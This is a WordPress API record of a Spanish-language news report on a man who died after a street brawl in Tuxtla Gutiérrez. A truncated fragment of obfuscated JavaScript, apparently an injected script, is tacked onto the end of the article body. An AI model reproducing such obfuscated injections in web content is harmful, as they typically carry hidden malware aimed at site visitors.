{"id":15587,"date":"2024-05-14T03:19:57","date_gmt":"2024-05-14T03:19:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15587"},"modified":"2024-05-14T03:19:58","modified_gmt":"2024-05-14T03:19:58","slug":"hombre-fallece-tras-rina-en-el-centro-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15587","title":{"rendered":"Hombre fallece tras ri\u00f1a en el centro de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15589\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656640308-1024x576.jpg\" alt=\"\" class=\"wp-image-15589\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656640308-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656640308-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656640308-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656640308.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15588\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656643751-1024x576.jpg\" alt=\"\" class=\"wp-image-15588\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656643751-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656643751-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656643751-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656643751.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"15590\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656637584-576x1024.jpg\" alt=\"\" class=\"wp-image-15590\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656637584-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656637584-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656637584-768x1366.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656637584-864x1536.jpg 864w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715656637584.jpg 899w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 13 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por la ma\u00f1ana un hombre perdi\u00f3 la vida luego de participar en una ri\u00f1a a la altura de la 6a Sur, entre 4a y 5a Poniente en el Barrio San Pascualito.<\/p>\n\n\n\n<p>En el lugar los vecinos relataron que desde la madrugada ocurrieron los hechos y el hombre qued\u00f3 tirado en \u00e9ste punto, y los polic\u00edas detuvieron a una mujer y se retiraron del lugar.<\/p>\n\n\n\n<p>Tras hacer varios llamados a los n\u00fameros de emergencias, finalmente, cerca de las 8 de la ma\u00f1ana que arrib\u00f3 personal de Protecci\u00f3n Civil y tras una valoraci\u00f3n determin\u00f3 que hab\u00eda muerto.<\/p>\n\n\n\n<p>Las causas concretas de la muerte se desconocen, los vecinos informaron que el hoy occiso recibi\u00f3 un fuerte golpe en la cabeza.<\/p>\n\n\n\n<p>Al lugar arribaron peritos de la Fiscal\u00eda General del Estado para realizar las diligencias correspondientes, levantar el cuerpo y trasladarlo al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 13 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por la ma\u00f1ana un hombre perdi\u00f3 la vida luego de participar en una ri\u00f1a a la altura de la 6a Sur, entre 4a y 5a Poniente en el Barrio San Pascualito. En el lugar los vecinos relataron que desde la madrugada &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15589,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15587","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15587","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15587"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15587\/revisions"}],"predecessor-version":[{"id":15591,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15587\/revisions\/15591"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15589"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15587"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15587"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15587"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}